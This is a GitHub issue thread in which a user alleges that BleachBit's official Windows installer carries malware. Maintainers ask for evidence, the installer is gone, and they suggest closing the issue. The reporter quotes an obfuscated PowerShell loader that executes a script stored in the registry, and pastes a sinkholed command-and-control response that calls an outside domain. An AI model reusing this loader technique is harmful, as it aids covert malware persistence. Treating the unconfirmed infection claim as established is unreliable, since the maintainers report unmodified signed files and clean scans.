### ISSUE TITLE
(Urgent) Official windows builds are most likely infected with malware.

### ISSUE THREAD

**Issue by Gomam0n-afk** [bleachbit/bleachbit#1418]
I could not verify this 100% in a short span of time, but i am pretty sure the Windows builds of this software are infected with malware, after installing, a very cryptic Powershell script launches from time to time, making a CMD or powershell window blink, after looking at it through process hacker i found out it's basically all very obfuscated, and connected to known C&C servers at some point.

After trial and error we figured out that the malware comes after installing bleachbit from the official website. (https://www.bleachbit.org/)
It seems to have been the case for a month or two ,i only just figured out that it came from here. please verify your build server ASAP.
![ProcessHacker_ri9VjHiuhV](https://user-images.githubusercontent.com/59240947/200146514-7e4c0ca0-4530-41b3-b7fb-16137bf679e0.png)
Attached here is a screenshot of one of the powershell processes related to the malware, i've figured out that it drops a powershell script into the registry as binary data inside it's own key that takes the name of a random registry key + random characters.

PS: Most AVs i've tried could not find any trace of this malware even though it was running. (Malwarebytes, ESET Node 32) Only Comodo Internet Security finding the unknown autorun + me removing it manually from the registry and system32 managed to remove it. I'm still not sure of what it does exactly but it probably sends DDoS attacks. as i've had network issues while i was infected with it

**Comment by abitrolly** [comment]
> After trial and error we figured out that the malware comes after installing bleachbit from the official website. (https://www.bleachbit.org/)

If you've got the installer that is malware infected, submit it to https://www.virustotal.com/

That's the only way I see to validate the claim.

**Comment by az0** [comment]
What is the filename you downloaded from bleachbit.org ?

If `BleachBit-4.4.2-setup.exe, did you see that it was digitally signed when you installed it?

I downloaded `BleachBit-4.4.2-setup.exe` and `BleachBit-4.4.2-portable.zip`. They have not been modified since the last release a year ago.

> If you've got the installer that is malware infected, submit it to https://www.virustotal.com/

Afterwards, please post the link here.

**Comment by Gomam0n-afk** [comment]
We sadly all removed the installer we got. Redownloading then checking with VT yielded 0 infection results, as i was expecting.

That being said, when i was infected, neither Malwarebytes or ESET find a single thing wrong, only me removing it manually, and Comodo finding an "unrecognized autorun" managed to find it.

This is an example of an earlier infection i got the same way a month ago, this script was hiding in my System32, and is extremely similar to the one i got 2 days ago.

$gHHeaTxJBmiHs=[ScriptBlock];$cFLyFctrosTpf=[string];$FsHlcVtmhNDfhJ=[char]; icm ($gHHeaTxJBmiHs::Create($cFLyFctrosTpf::Join('', ((gp 'HKLM:\SOFTWARE\PoliciesKcLrbb9').'DTURawnIX' | % { [char]$_ }))))

After following that registry key, i found this Powershell script hiding as binary data inside the key.
![unknown](https://user-images.githubusercontent.com/59240947/200210889-82c2a849-0f69-47db-9934-0f2adeec1ae9.png)
Not showing the rest because i'm not sure if there is some of my private info in there.

The infection i got yesterday from what seems to be a nefarious bleachbit installer was extremely similar, but it seems that the malware got updated since, i couldn't see any cleartext data inside the registry this time. however, after sniffing what domain this powershell script tried to connect to, most of them were dead, but a few of em were online, displaying this message (it seems like the domains were stolen in some way):

# Hello. My name is tweedge, and I am an ethical computer security researcher.
#
# If you are reading this, your computer has attempted to connect to
# Command-and-Control (C&C) infrastructure, and is very likely infected with
# malware. You need to disinfect your computer immediately.
#
# I have taken over some of the C&C infrastructure so it will return this
# benign response.
# 
# Again, please disinfect your computer immediately.
Invoke-WebRequest https://bideo-endpoint.xyz/CONFIRM
Start-Sleep -Seconds 3600


This is sadly all the info i can give, as we were more preocupied by cleaning this infection and trying to figure out what it was doing (looks like a DDoS botnet) than archiving everything it did, i lost the installer by pure chance though, as i literally just cleaned my download folder for more space today, not really thinking about anything ...

**Comment by abitrolly** [comment]
I suggest to close the issue until you can collect the evidence. There is nothing we can do here.

**Comment by Gomam0n-afk** [comment]
> I suggest to close the issue until you can collect the evidence. There is nothing we can do here.

Maybe i'll setup a VM and do some testing there when i got time. i just wanted your attention to check if the build servers or if the release itself has been infected over time.
Thank you for your time.

**Comment by abitrolly** [comment]
@Gomam0n-afk better backup critical data, format the drive and setup a new system from scratch. If you say there is reinfection, most likely the rootkit is hidden somewhere else.
